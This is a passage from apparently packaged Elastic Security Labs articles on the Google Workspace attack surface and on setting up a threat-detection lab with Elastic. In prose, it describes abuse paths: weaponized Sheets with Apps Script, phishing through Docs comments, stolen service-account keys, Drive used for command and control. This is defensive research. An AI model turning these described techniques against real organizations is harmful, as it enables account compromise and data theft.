VPN and proxy settings can be configured as well, with routing through Google’s DNS infrastructure by default or custom routing if chosen.\n\nWindows endpoints can also be managed via GW, with the capability to modify settings and synchronize data with Active Directory (AD) or an existing LDAP server. This is accomplished with GW’s [Google Cloud Directory Sync](https://support.google.com/a/answer/106368?hl=en) (GCDS). Settings can be applied to each endpoint, such as BitLocker, automatic updates or authentication via [Google Credential Provider for Windows](https://support.google.com/a/answer/9250996?hl=en) (GCPW). GCPW allows users to log in to a Windows endpoint with their Google account for authentication. Users with sufficient privileges can make changes to remote enterprise endpoints by configuring a [custom policy](https://support.google.com/a/answer/10181140#zippy=%2Cwindows-device-management%2Ccustom-settings) through the configuration service provider (CSP). This is possible with the Windows 10 enterprise platform, which exposes endpoint configuration settings that allow GW, as an MDM service, to read, set, modify or delete configuration settings. Microsoft has an [extensive list](https://learn.microsoft.com/en-us/windows/configuration/provisioning-packages/how-it-pros-can-use-configuration-service-providers#a-href-idbkmk-csp-docahow-do-you-use-the-csp-documentation) of CSP settings that are exposed for management via custom policies. 
While integration between platforms is important to daily operations, this service equips adversaries with the capability to expand their intrusion into the Windows ecosystem.\n\n## Organizational Structure\n\nThe digital structure of an enterprise in GCP or GW is often hierarchical: the registered domain is the top-level, parent, or root, and any nested organizations under it are used for grouping and permission scoping.\n\nAn important GW concept to understand is the OU, which can be thought of as a “department” within an organization and can itself have subsidiary OUs. The hierarchy starts with a top-level OU, typically from the primary domain registration and organization name, where child units can be added as needed. Service and application access are then inherited from the top-level OU if not specified. Users assigned to an OU will have access to any services and resources as inherited.\n\nAs an alternative, administrators can create and manage access groups to add an additional layer of resource-based control. Users who are assigned to an access group will inherit access and permissions from those set for the group itself, which may bypass restrictions set on the OU they are assigned to. For example, if an engineering OU lacks access to Drive and Docs, a user assigned to an access group with access to Drive and Docs can bypass the OU’s settings.\n\n\n\nGW’s organizational structure and layered approach to access control make it easier for administrators to scope roles for users. Unfortunately, incomplete or misconfigured access controls could allow unexpected permission inheritance from the top-level OU. 
Access restrictions could unexpectedly be bypassed by users outside their expected access groups, thus introducing insider threat risk via additional cloud roles ([T1098.003](https://attack.mitre.org/techniques/T1098/003/)).\n\n## Identity Access and Management\n\n### Identity vs Account\n\nThe identity of users when using Google’s services is that of the account being used, often the email address. Identity does differ from user account slightly in that the identity of a user is unique, but the user account is a data structure keeping track of configurations, attributes, activities and more when interacting with Google’s services.\n\nStandalone Gmail addresses (@gmail.com) are consumer accounts typically meant to be used by a private individual, whereas Gmail addresses with a registered domain name are managed user accounts as their lifecycle and configuration are fully managed by the organization. Therefore, when we discuss IAM in this publication, the context typically concerns managed user accounts whose identity and data are managed by the GW organization.\n\nHowever, the relationship between identity and account does not have to be 1:1, meaning an email address, or identity, can be tied to two separate user accounts. If an organization does not enforce a new and separate identity for their users, risk looms around the private user account whose settings are managed by the user themselves, not the organization. In this example, the widespread use of valid compromised accounts undermines the ability of defenders to identify when this is malicious versus benign.\n\n### Machine Accounts\n\nMachine accounts allow developers to interact with Google services and resources programmatically. These are not managed within GW, but rather within Google Cloud Platform (GCP) via the use of service accounts. 
A bridge exists in the form of domain-wide delegation between GW and GCP.\n\nThis feature authorizes GCP service accounts to access data, resources, services and much more within GW via application APIs. OAuth2 is the protocol used for authentication between GCP service accounts and GW.\n\nThe most common risk of this approach lies in the storage and use of service account credentials. Since service accounts often have elevated privileges due to their automation and programmatic intentions, adversaries prioritize finding these credentials, for example on a Linux cloud worker. Often, public/private key pairs are stored insecurely for local scripts or programs that use them. Adversaries can then discover the unsecured credentials ([T1552](https://attack.mitre.org/techniques/T1552/)) from a text file, extract them from memory, environment variables or even log files. Once compromised, adversaries have a bridge into GW from GCP with a valid service account that may be monitored less diligently than a user account.\n\n### Roles and Groups\n\nWithin GW, role-based access control (RBAC) only exists at the administrative level. This means the default and custom roles can be set up and configured from the admin console; however, the privileges available are mainly administrative. As we discussed earlier, Google’s hierarchy is top-down starting with the root OU, followed by child OUs; resources and services are enabled or disabled on a per-OU basis. By default, a non-admin user belongs under the root OU, thus inheriting any access explicitly set at the root level where global privileges should be minimal.\n\nNot to be confused with Google’s Group application, access groups allow administrators to set specific access and privileges to resources and services at the user-level, similar to role-level controls. Typically, a group is created and then privileges to resources and services are assigned. 
Users are then added as members to those specific groups, overriding or superseding inherited privileges from the OU.\n\n### External Identities\n\nAs stated before, Gmail’s email names are unique IDs so users can use the same ID for both their consumer account and managed user accounts with the use of an external identity provider (IdP). This process typically requires single sign-on (SSO) via security assertion markup language (SAML) and therefore the IdP must recognize the identity before they can sign on.\n\nAuthentication is relayed from GW to the SAML IdP and relies on trusting the external provider’s identification verification. This is even true for Active Directory (AD) services or Okta where those become the external authoritative source. Data in transit during the SAML SSO process presents the greatest risk, and intercepted SAML responses to the IdP may be used to authenticate via forged credentials ([T1606.002](https://attack.mitre.org/techniques/T1606/002/)).\n\n## Developer Resources\n\nThere are two methods for programmatically interacting with GW: Google [Apps Script](https://workspace.google.com/products/apps-script/) and [REST APIs](https://developers.google.com/workspace). Google Apps Script is an application development platform for quickly building business applications that integrate with GW. REST APIs, by contrast, provide a direct method of communicating with GW, often in cases where integration is not fast or easy. External interaction with GW is another benefit of REST APIs, as Apps Script is meant for internal use.\n\n### Apps Script\n\nWith Apps Script, developers use JavaScript with access to built-in libraries specific to each Google application. The term “rapid” is often emphasized because the platform is available at the domain, script.google.com, and tied directly to the organization the user is logged into, with no installation required. 
This tool can be extremely useful for accomplishing tasks in GW related to existing applications, administrative settings and more.\n\n\n\nEach coding application you create in Apps Script is known as a project and can be used by other GW tools. Within that project, you write your JavaScript code as you see fit. From its console, you can run, debug or view execution logs.\n\nThe project can also be deployed to your GW with versioning control as a web application, API executable, Add-on or Library. Scripts can also be deployed as libraries, making code shareable across projects. Last but not least, triggers can be set for each project where specific functions can be run at specific times, allowing developers to choose which code blocks are executed and when.\n\n## Applications\n\nIn GW, the main attraction to organizations is typically the abundance of native applications offered by Google. Google’s Drive, Docs, Gmail, Sheets and Forms are just a few that are readily available to users for communication, storage, documentation or data gathering and analysis. All of these applications make up a user’s workspace, but are also targeted by adversaries because of their popularity and seamless integration with each other.\n\n\n\nTherefore, it is essential to understand that while applications complement each other in GW, they often require [authorization](https://developers.google.com/apps-script/guides/services/authorization) to each other, where access rights must be explicitly granted by the user. While security practitioners may generally be suspicious of applications requiring access, general users may not be, and may grant access without thinking twice. 
This then allows malicious applications, such as Apps Script functions contained in a Google Sheet, to access the private data behind each application.\n\n### Gmail\n\nArguably the most popular application provided by GW, Gmail has historically been abused by adversaries as a delivery mechanism for malicious attachments or links. For those unaware, Gmail is Google’s free email service with nearly 1.5 billion active users as of 2018, according to a Statista [report](https://www.statista.com/statistics/432390/active-gmail-users/).\n\nPhishing ([T1566](https://attack.mitre.org/techniques/T1566/)) is often the most common technique conducted by adversaries with the help of Gmail, where stealing valid credentials is the goal. Victims are sent emails containing malicious attachments or links where malware may be installed or a user is redirected to a fake website asking for credentials to log in. If account compromise occurs, this allows for internal spear phishing ([T1534](https://attack.mitre.org/techniques/T1534/)) attacks, potentially targeted towards an existing administrator.\n\nEmail collection ([T1114](https://attack.mitre.org/techniques/T1114/)) is another technique used by adversaries whose modus operandi (MO) may simply be to collect sensitive information. In GW, administrators have privileges to set custom global mail routes for specific users, groups or OUs, whereas users can create their own forwarding rules as well. An adversary’s capability to do so, whether manual or programmatic, comes down to valid account compromise; therefore, signs of this activity may be found later in the intrusion process.\n\nTaking Gmail a step further, adversaries may also use GW’s web services ([T1102](https://attack.mitre.org/techniques/T1102/)) for command and control purposes as [identified](https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/) by ESET researchers regarding the ComRAT v4 backdoor of 2020. 
With attribution pointed towards advanced persistent threat (APT) group, Turla, the abuse of Gmail is also a tool for more advanced threats.\n\n### Drive\n\n[Google Drive](https://workspace.google.com/products/drive/), being a free digital storage service with an active Gmail account, is also a common target by adversaries. Where valid accounts are compromised, adversaries have the capability to steal private data stored in Google Drive. Sharing documents in Google Drive relies on a trust model, where the user can create a custom shareable link and invite others. Administrators have the capability to enable and expose public shared drives from their organization as well. Access and privileges rely on sharing permissions set by the owner or organization and the intended recipient for either the shareable link or Google cloud identity who has access to those shared objects.\n\nLet’s not forget that GW allows administrators to set up enterprise mobility management (EMM) and mobile device management (MDM) for mobile devices. These mobile devices then have access to private shared drives in an organization’s Google drive space. An adversary could take advantage of this to obtain unauthorized access to mobile devices via these remote services ([TA0039](https://attack.mitre.org/tactics/TA0039/)). Geographic coordinates of a mobile device or end user could also be obtained from such services if abused to do so.\n\nCommand and control via bidirectional communication ([T1102.002](https://attack.mitre.org/techniques/T1102/002/)) to a Google Drive is another option for adversaries who may be using the service to host and deploy malicious payloads as those from [APT29](https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/). Oftentimes, this reflects compromised web services ([T1584.006](https://attack.mitre.org/techniques/T1584/006/)) simply through a valid account and enabled Google Drive API. 
This is often the case when adversaries may leverage Google Drive to stage exfiltrated data programmatically prior to its final destination.\n\n### Docs\n\nIntegrated with Google Drive is [Google Docs](https://workspace.google.com/products/docs/), a free online word processing service where users can create documents which are then stored in their Google Drive. For collaboration purposes, documents have extensive markup capabilities, such as comments, which have recently been abused to distribute phishing and malware. This technique, [discussed](https://www.avanan.com/blog/google-docs-comment-exploit-allows-for-distribution-of-phishing-and-malware) by Check Point company Avanan, allows adversaries to simply create a document and add a comment where they include the target’s email address and a malicious link, helping evade spam filters and security tools. Combining this phishing campaign with a native JavaScript application development platform such as Apps Script in GW would allow for expanded distribution with minimal costs. Luckily, the extent of malicious Google documents ends with malicious links, but it would be naive to suggest adversaries will not eventually develop new techniques to abuse the service.\n\n### Sheets\n\nAs with Google Docs, [Google Sheets](https://workspace.google.com/products/sheets/) is another service often abused by adversaries to deliver malicious links or payloads. Google Sheets is a spreadsheet program, similar to Excel from Microsoft. Automated tasks can be created with macros, along with triggers to execute them. While built-in functions exist, custom functions can be created via Google’s Apps Script platform and then imported into the Google Sheet document itself. Apps Script has native JavaScript libraries for interacting with other Google services and their respective APIs. 
Thus, if an adversary were to weaponize a Google Sheet document, resource development starts with a custom function built with Apps Script. The function is imported into the Google Sheet and then shared with the intended target by commenting their email address and allowing access. Once triggered, the malicious code from the function would be executed and continue the intrusion process.\n\nA step further may be to share a [copy link](https://support.google.com/a/users/answer/9308866?hl=en) rather than an edit link; the copy link duplicates the sheet containing the malicious macro into the target’s own Google Drive, and upon execution the code carries out its intended task as the target, who is now the sheet’s owner. For distribution, access to a user’s contacts within their GW organization may allow worm-like capabilities as [discovered](https://nakedsecurity.sophos.com/2017/05/05/google-phish-thats-a-worm-what-happened-and-what-to-do/) by Sophos in 2017.\n\n## Marketplace\n\nGW’s [marketplace](https://apps.google.com/supportwidget/articlehome?hl=en&article_url=https%3A%2F%2Fsupport.google.com%2Fa%2Fanswer%2F172391%3Fhl%3Den&product_context=172391&product_name=UnuFlow&trigger_context=a) is an online application store with additional enterprise applications that can be integrated into an organization and accessed by users. Administrators are responsible for managing application accessibility and surveying the risk associated with such apps. A large portion of these applications are 3rd-party, and Google clearly states their [policies](https://developers.google.com/workspace/marketplace/terms/policies) for being a contributor. 
The risk associated with 3rd-party applications in the GW marketplace is access to private data from information repositories ([T1213](https://attack.mitre.org/techniques/T1213/)) or the resident data of the user and/or organization behind each application.\n\nFortunately for administrators, when browsing applications, the permissions an application requests can be reviewed via its listing prior to installation. This way, administrators can weigh whether the risk inherited from such access is worth the solution it may provide.\n\n\n\n## Reporting\n\nAs with most cloud consoles and environments, GW has a native reporting feature that helps administrators capture the activity in their environment. Located in the admin console of GW under Reporting, administrators have the following options.\n\n- Highlights - Dashboard of basic metrics for GW environments\n- Reports - Apps, cost, user and devices reporting in the form of basic dashboard metrics or tabular data about user accounts\n- Audit and Investigation - Location of all logs, categorized by activity\n- Manage Reporting Rules - Redirection to the rules space, filtered on “Reporting” rules, which are custom\n- Email Log Search - Search across the Gmail accounts of all users within the organization. Filters include Date, Sender, Sender IP, Recipient, Recipient IP, Subject and Message ID\n- Application Uptime - Uptime for applications enabled in GW. Uptime is relative to Google’s infrastructure.\n\nOf this reporting, Google does a decent job of providing tabular data about user status and account activity in GW, such as 2-step verification status and password strength, as well as additional security metrics. One example is shared links to Google resources that have been accessed outside of the domain. 
Additional user report documentation from Google can be found [here](https://apps.google.com/supportwidget/articlehome?hl=en&article_url=https%3A%2F%2Fsupport.google.com%2Fa%2Fanswer%2F4580176%3Fhl%3Den&product_context=4580176&product_name=UnuFlow&trigger_context=a).\n\nThe most reliable data is GW’s native logging, found under “Audit and Investigation”. As stated earlier, these logs are organized into their own separate folders based on activity, application, identity or resource.\n\n\n\nLogs are stored in a tabular format with date, event, description, actor and IP address all recorded by default. The description contains another layer of verbosity as to what activity occurred, oftentimes including JSON key and value pairs for specific values pulled from GW for reporting.\n\nIn regard to threats, adversaries will often attempt indicator removal ([T1070](https://attack.mitre.org/techniques/T1070/)) by clearing audit logs to remove any potential footprints; however, GW audit logs are managed by Google and are subject only to [retention policies](https://apps.google.com/supportwidget/articlehome?hl=en&article_url=https%3A%2F%2Fsupport.google.com%2Fa%2Fanswer%2F7061566%3Fhl%3Den&product_context=7061566&product_name=UnuFlow&trigger_context=a). Therefore, it is essential to route audit logs from GW to an on-premise or cloud storage solution, such as GCP storage buckets. For more information on how Elastic’s GW integration routes audit logs, visit [here](https://docs.elastic.co/en/integrations/google_workspace).\n\n## Rules\n\nWhile GW provides a reporting feature that focuses on logging activity within an organization’s digital environment, it also has a detection rules feature.\n\nThese rules are not directly marketed as a security information and event management (SIEM) tool, but they resemble that functionality. Shipped with some default rules, the “Rules” feature in GW allows administrators to automatically monitor for specific activity and set specific actions. 
Each rule allows you to customize the conditions for the rule to match on and, of course, what actions to perform when conditions are met. Rules are broken down into reporting, activity, data protection, system defined, or trust rules, where custom creation and viewing require specific privileges.\n\n\n\nIn regard to granularity, administrators are at the mercy of data sourced from the audit logs when creating custom rules, whereas system defined rules provided by Google have additional data source insight. Rule alerts are directly accessible via the security alert center feature in GW, where they can be further analyzed, assigned, and have their status updated.\n\n\n\n## Conclusion\n\nWith this introduction to GW as an attack surface, we hope you better understand the risks associated with these enterprise resources. Powerful virtual workspaces have become an essential capability of distributed productivity, which both establishes their utility and exposes them to threats. As adversaries continue to abuse GW, enterprises would be well-advised to understand its security while taking ownership of improving it. Proper administration, strong policy settings, sound IAM, and making use of the visibility available are some of the recommendations we would offer.\n\nSoon we’ll release part two in this series and show you how to set up a threat detection lab for GW with Elastic components. And in our third publication, we’ll explore in-depth attack scenarios and the specific defensive strategies that counter them.\n"
+ },
+ "title": "Google Workspace Attack Surface",
+ "slug": "google-workspace-attack-surface-part-one",
+ "subtitle": "Part One: Surveying the Land",
+ "date": "2023-01-03",
+ "description": "During this multipart series, we’ll help you understand what GW is and some of the common risks to be aware of, while encouraging you to take control of your enterprise resources.",
+ "author": [
+ {
+ "slug": "terrance-dejesus"
+ }
+ ],
+ "image": "photo-edited-01-e.jpg",
+ "category": null,
+ "tags": [
+ "threat detection",
+ "cloud security",
+ "google workspace",
+ "google cloud"
+ ]
+ },
+ "id": "security_labs_content-google_workspace_attack_surface_part_one-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-google_workspace_attack_surface_part_two-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-google_workspace_attack_surface_part_two-md.json
new file mode 100644
index 00000000000..0b0c143bed6
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-google_workspace_attack_surface_part_two-md.json
@@ -0,0 +1,27 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Google Workspace Attack Surface\"\nslug: \"google-workspace-attack-surface-part-two\"\ndate: \"2023-01-03\"\nsubtitle: \"Part Two: Setup Threat Detection With Elastic\"\ndescription: \"During part two of this multipart series, we’ll help you understand how to setup a GW lab for threat detection and research.\"\nauthor:\n - slug: terrance-dejesus\nimage: \"photo-edited-01-e.jpg\"\ncategory:\ntags:\n - threat detection\n - cloud security\n - google workspace\n - google cloud\n---\n\n# Preamble\n\nAs a continuation of this series about Google Workspace’s (GW) attack surface, we diverge from surveying the land and focus on setting up a threat detection lab with Elastic. In [part one](https://www.elastic.co/security-labs/google-workspace-attack-surface-part-one), we explored the important resources and capabilities of GW, while tracking intrusion techniques that adversaries may leverage. In part two, we will give you the foundation needed to begin researching threats targeting GW, and provide resources for detecting those threats using Elastic technologies. The information used during the steps provided should be adjusted for your own lab and testing environment. If you do not feel the need to set up your own lab, that’s fine as this includes examples showing you how we detect threats to GW.\n\nFollowing this will be part three of this series, in which we cover common intrusion techniques by emulating the GW environment and simulating threat activity. In doing so, we’ll build detection logic to further detect several common techniques.\n\nElastic resources will be freely available but a registered domain for GW is necessary and will be covered in the upcoming steps, strictly for maximum authenticity. 
Approximate lab setup time is 20-30 minutes.\n\n## Let’s Get You Up to Speed\n\nFor those who may not be familiar with Elastic’s current stack: take a few minutes to review the current [solutions](https://www.elastic.co/blog/category/solutions) it offers. In short, the stack is an all-encompassing product that can be deployed anywhere from a single interface! If you would like to explore more information about the Elastic security solution, the [documentation](https://www.elastic.co/guide/en/security/current/getting-started.html) is a great starting point.\n\nIn this article, we will focus specifically on the security solution, which includes a robust detection engine with 600+ pre-built threat [detection rules](https://github.com/elastic/detection-rules/tree/main/rules), and an endpoint agent that can be deployed to Windows, Linux, or macOS endpoints, collect data from various on-premise and cloud environments, and detect and prevent threats in real time. Not to mention, this endpoint behavior logic is also all public in our [protections artifacts](https://github.com/elastic/protections-artifacts) repository.\n\nOur endpoint agent orchestrator, [Fleet](https://www.elastic.co/guide/en/fleet/current/fleet-overview.html), is manageable from the Kibana interface in the Elastic Stack. Fleet allows us to set up and deploy security policies to our endpoint agents. These policies are extremely customizable, thanks to an extensive list of supported [Integrations](https://www.elastic.co/integrations/).\n\nThink of an Integration as a module for the Elastic Agent that provides processors to collect specific data. When added to our security policy, an Integration allows the Elastic Agent to ingest logs, apply our Elastic Common Schema (ECS), and store them in the Elastic Stack for searching or to trigger alerts. 
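To make “apply our Elastic Common Schema (ECS)” concrete, here is a rough, simplified sketch of how one raw Admin SDK Reports API activity record could be normalized into a few ECS-style fields. This is illustrative only, not the GW integration’s actual ingest pipeline, and the sample record is fabricated:

```python
# Simplified illustration of normalizing a raw Admin SDK Reports API
# activity record into a few ECS-style fields. This is NOT the actual
# Google Workspace integration pipeline; the sample record is fabricated.
raw_activity = {
    "id": {"time": "2023-01-03T12:00:00.000Z", "applicationName": "admin"},
    "actor": {"email": "terrance@dejesusarcheology.com"},
    "ipAddress": "203.0.113.10",
    "events": [{"name": "CREATE_GMAIL_SETTING", "type": "EMAIL_SETTINGS"}],
}

ecs_doc = {
    "@timestamp": raw_activity["id"]["time"],
    "event": {
        "dataset": "google_workspace." + raw_activity["id"]["applicationName"],
        "action": raw_activity["events"][0]["name"],
    },
    "source": {"ip": raw_activity["ipAddress"]},
    "related": {"user": [raw_activity["actor"]["email"].split("@")[0]]},
}
print(ecs_doc["event"]["dataset"], ecs_doc["event"]["action"])
# google_workspace.admin CREATE_GMAIL_SETTING
```

Field names like `event.dataset` and `related.user` are the ones we will query against later in this article.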
If you're curious about a specific integration Elastic has, you can search for it [here](https://www.elastic.co/integrations/data-integrations)!\n\nWith this information, you could almost assume the Elastic Stack allows you to manage all of this with just one information technology (IT) guy.\n\n\n\nEither way, our goal is to create a threat detection lab for [Google Workspace](https://docs.elastic.co/en/integrations/google_workspace) as depicted in this diagram:\n\n\n\nThe process of setting this up is pretty straightforward. Note that your environment does not have to be cloud-focused; if you prefer to do everything locally, you are more than welcome to. The [Elastic Container Project](https://www.elastic.co/security-labs/the-elastic-container-project) is a great resource for a local Docker build of the stack.\n\n## Sign-Up for Google Workspace\n\nIn order for you to use GW, you must have a registered Google account email address and organization. If you already have GW set up for an organization, log in to the [admin console](https://admin.google.com/) and continue to Create a Project in Google Cloud. This process will not go into detail about creating a Google account.\n\nOnce created, do the following:\n\n1. Visit [https://workspace.google.com](https://workspace.google.com) \\> Get Started\n2. Fill out the information requested in subsequent steps\n3. Business name: DeJesus’ Archeology\n4. Number of employees: 2-9\n5. Region: United States\n\nFor this lab, we will use DeJesus’ Archeology as a business name because it's memorable (also who didn't want to be an archeologist growing up?). We'll be digging up more recent evidence in these logs than we would from the earth, of course.\n\nEventually you will be asked, “Does your business have a domain?”. GW requires you to have your own domain name to use its services, especially the admin console for an organization. 
For today, we will select “No, I need one” and will use dejesusarcheology.com, but please select or use your own. From here, you will need to enter additional business information to register your domain and organization.\n\nYou will need a username to sign into your GW account and create your business email address. We'll use [terrance@dejesusarcheology.com](mailto:terrance@dejesusarcheology.com) as the administrative email. When finished, continue to log in to your GW admin console with your new email, where you should be greeted by an interface similar to the one below.\n\n\n\n## Setup Google Cloud Platform (GCP)\n\nFor the Elastic agent to ingest GW logs, it relies solely on making requests to the [Reports API](https://developers.google.com/admin-sdk/reports/reference/rest) and therefore, we need to leverage GCP for a managed service account. This service account’s credentials will be used by our Elastic agent to then leverage the admin SDK API for pulling logs from GW’s Reports API into the Elastic Stack. Domain-wide delegation and OAuth2 are important for authentication and resource access but will be enabled through steps later on.\n\n### Create a Project\n\nGCP is hierarchical, so we must first create a project. If you already have a GCP environment set up, we recommend creating a new project that links to your GW via the registered domain by following similar steps below.\n\nComplete the following steps:\n\n1. Log into [Google Cloud](https://console.cloud.google.com/) with the same Google account used to set up GW\n2. Select the following: Select a project \\> New Project\n3. Enter the following information described in subsequent steps\n4. Project name: dejesus-archeology\n5. Organization: dejesusarcheology.com\n6. Location: dejesusarcheology.com\n\nWhen done, you should have a new organization and project in GCP. 
By default, only the creator of the project has rights to manage the project.\n\n\n\n### Enable Admin SDK API\n\nOur Elastic agent will eventually use our GCP service account, which uses the [Workspace Admin SDK](https://developers.google.com/admin-sdk) to interact with the GW admin console REST API; therefore, the API needs to be enabled in GCP. To keep your mind at ease, we will only be enabling read access to the Reports API for this admin SDK.\n\nComplete the following steps:\n\n- Select the Google Cloud navigation menu \\> APIs & Services \\> Enabled APIs & Services\n- Search and enable “Admin SDK API” from the API library page\n\nWhen finished, you will have enabled the Admin SDK API within your project, where your service account will have access to pull data from GW.\n\n\n\n### Configure OAuth Consent Screen\n\nWe next need to set up the [OAuth consent screen](https://developers.google.com/workspace/guides/configure-oauth-consent) for our service account and application; API requests they make to GW will include the necessary authorization token.\n\nComplete the following steps:\n\n1. Select the Google Cloud navigation menu \\> APIs & Services \\> Enabled APIs & Services \\> OAuth Consent Screen\n2. User Type \\> Internal \\> Create\n3. Fill out the following information in subsequent steps\n4. App name: elastic-agent\n5. User support email: [terrance@dejesusarcheology.com](mailto:terrance@dejesusarcheology.com)\n6. Authorized domains: dejesusarcheology.com\n7. Developer contact information: [terrance@dejesusarcheology.com](mailto:terrance@dejesusarcheology.com)\n8. Save and Continue\n9. Save and Continue\n10. Back to Dashboard\n\n\n\nWhen finished, we will have a registered application using OAuth 2.0 for authorization and the consent screen information set. Please note, the default daily token request limit for this app is 10,000, but it can be increased. 
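To put that daily limit in perspective, a quick back-of-the-envelope calculation (assuming one API request per polling cycle, which is a simplification) shows how little of the quota a frequent polling interval consumes:

```python
# Rough daily request count at a 10-minute polling interval versus the
# default 10,000 daily token request limit (assumes one request per cycle).
daily_limit = 10_000
interval_minutes = 10
requests_per_day = 24 * 60 // interval_minutes
print(requests_per_day)  # 144, roughly 1.4% of the daily limit
```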
We recommend setting your Elastic agent’s pull rate to every 10 minutes, which should not come close to reaching this threshold. Setting the agent’s pull rate will be done at a later step.\n\n### Create a Service Account\n\nFor the Elastic agent to ingest data from GW, we will need to create a [service account](https://cloud.google.com/iam/docs/service-accounts) for the agent to use. This account is meant for non-human applications, allowing it to access resources in GW via the Admin SDK API we enabled earlier.\n\nTo create a service account, do the following:\n\n1. Select the navigation menu in Google Cloud \\> APIs & Services \\> Credentials \\> Create Credentials \\> Service Account\n2. Enter the following information:\n3. Service account name: elastic-agent\n4. Service account ID: elastic-agent\n5. Leave the rest blank and continue\n6. Select your new Service Account \\> Keys \\> Add Key \\> Create New Key \\> JSON\n\nBy default, the Owner role will be applied to this service account based on inheritance from the project; feel free to scope permissions more tightly as you see fit. When finished, you should have a service account named elastic-agent and its credentials in a JSON file saved to your host. We will enter this information during our Fleet policy integration setup.\n\n\n\n### Enable Domain-Wide Delegation\n\nOur service account will need [domain-wide delegation](https://developers.google.com/admin-sdk/directory/v1/guides/delegation) of permissions to access APIs that reach outside of GCP and into GW. The data necessary for this (an API key, a service account, and an OAuth client ID) was established in earlier steps.\n\nTo enable domain-wide delegation for your service account, do the following:\n\n1. In your GW Admin Console select \\> Navigation Menu \\> Security \\> Access and data control \\> API controls\n2. Select Manage Domain Wide Delegation \\> Add New\n3. 
Client ID: OAuth ID from Service Account in GCP\n4. Google Cloud Console \\> IAM & Admin \\> Service Accounts \\> OAuth 2 Client ID (copy to clipboard)\n5. OAuth Scopes: [https://www.googleapis.com/auth/admin.reports.audit.readonly](https://www.googleapis.com/auth/admin.reports.audit.readonly)\n\n\n\nOur service account in GCP only needs access to admin.reports.audit.readonly to access GW [Audit Reports](https://developers.google.com/admin-sdk/reports/v1/get-start/overview), which are then converted into ECS documents for our Elastic Stack.\n\nIf you made it this far, CONGRATULATIONS, you are doing outstanding! Your GW and GCP environments are now set up and finished. At this point you are almost done; we just need to set up the Elastic Stack.\n\n## Setting Up Your Free Cloud Stack\n\nFor this lab, we will use a [free trial](https://cloud.elastic.co/registration) of Elastic Cloud with your preference of a Google or Microsoft email account. You also have the option to create the stack in [Amazon Web Services](https://www.elastic.co/partners/aws?utm_campaign=Comp-Stack-Trials-AWSElasticsearch-AMER-NA-Exact&utm_content=Elasticsearch-AWS&utm_source=adwords-s&utm_medium=paid&device=c&utm_term=amazon%20elk&gclid=Cj0KCQiA1ZGcBhCoARIsAGQ0kkqI9gFWLvEX--Fq9eE8WMb43C9DsMg_lRI5ov_3DL4vg3Q4ViUKg-saAsgxEALw_wcB) (AWS), [GCP](https://www.elastic.co/guide/en/cloud/current/ec-billing-gcp.html) or [Microsoft Azure](https://www.elastic.co/partners/microsoft-azure) if you’d like to stand up your stack in an existing Cloud Service Provider (CSP). The free trial will deploy the stack to GCP.\n\nOnce registered for the free trial, we can focus on configuring the Elastic Stack deployment. For this lab, we will call our deployment gw-threat-detection and deploy it in GCP. It is fine to leave the default settings for your deployment, and we recommend the latest version for all the latest features. 
For the purposes of this demo, we use the following:\n\n- Name: gw-threat-detection\n- Cloud provider: Google Cloud\n- Region: Iowa (us-central1)\n- Hardware profile: Storage optimized\n- Version: 8.4.1 (latest)\n\nOnce set, select “Create deployment” and the Elastic Stack will automatically be deployed in GCP, where your deployment credentials will be displayed. You can download these credentials as a CSV file or save them wherever you best see fit, but they are crucial to logging into your deployed stack. The deployment takes approximately 5 minutes to complete, and once finished you can select “continue” to log in. Congratulations, you have successfully deployed the Elastic Stack within minutes!\n\n\n\n## Setup Fleet from the Security Solution\n\nAs a reminder, [Fleet](https://www.elastic.co/guide/en/fleet/current/fleet-overview.html) enables the creation of a security policy, which can incorporate the [GW integration](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html) on an Elastic agent, in order to access and ingest GW logs into our stack.\n\n### Create a Google Workspace Policy\n\nIn order for our Elastic Agent to know which integration it is using, what data to gather and where to stream that data within our stack, we must first set up a custom Fleet policy, named Google Workspace.\n\nTo set up a Fleet policy, do the following in your Elastic Stack:\n\n- Navigation menu \\> Management \\> Fleet \\> Agent Policies \\> Create agent policy\n- Enter “Google Workspace” as a name \\> Create Agent Policy\n\n\n\n### Install the Elastic agent on an Endpoint\n\nAs previously mentioned, we have to install at least one agent on an endpoint to access data in GW; this agent will be subject to the deployed GW policy. We recommend a lightweight Linux host, either as a VM locally or in a CSP such as GCP to keep everything in the same environment. 
I will be using an [Ubuntu 20.04 LTS](https://releases.ubuntu.com/focal/) VM instance in Google’s Compute Engine (GCE) in the same GCP project we have been working on. Your endpoint can be lightweight, such as GCP N1 or E2 series, as its sole purpose is to run the Elastic agent.\n\nAfter your endpoint is set up, do the following in your Elastic Stack to deploy the agent:\n\n1. Navigation menu \\> Management \\> Fleet \\> Agents \\> Add Agent\n2. Ensure the GW policy is selected\n3. Select the appropriate OS\n4. Select the clipboard icon to copy the commands\n5. Run the commands on your endpoint to install the agent\n6. Once finished, Fleet should show a checkmark and state 1 agent has been enrolled and Incoming data confirmed\n\n\n\n### Assign Google Workspace Integration to Fleet Policy\n\nWe must add the GW integration to our GW policy in order for it to collect data from GW and stream it to our Elastic Stack. We will configure the GW integration settings with the information created when we set up our GW environment, avoiding [unsecured credentials](https://attack.mitre.org/techniques/T1552/) on our Ubuntu host.\n\n⚠️ The GW integration has a default interval of 2 hours, meaning the Elastic agent will retrieve data every 2 hours due to potential [data retention and lag times](https://support.google.com/a/answer/7061566?hl=en). This should be adjusted in the integration itself and is accounted for in the following steps within your Elastic Stack:\n\n1. Navigation menu \\> Fleet \\> Agent Policies \\> Google Workspace \\> Add Integration\n2. Search for “Google Workspace” \\> Select Google Workspace\n3. Select “Add Google Workspace”\n4. Enter the following information for this integration:\n5. Integration name: google workspace\n6. Jwt File: Copy contents of JSON file from service account creation steps\n7. Delegated Account: [terrance@dejesusarcheology.com](mailto:terrance@dejesusarcheology.com) (Use your own)\n8. Interval: 10m\n9. 
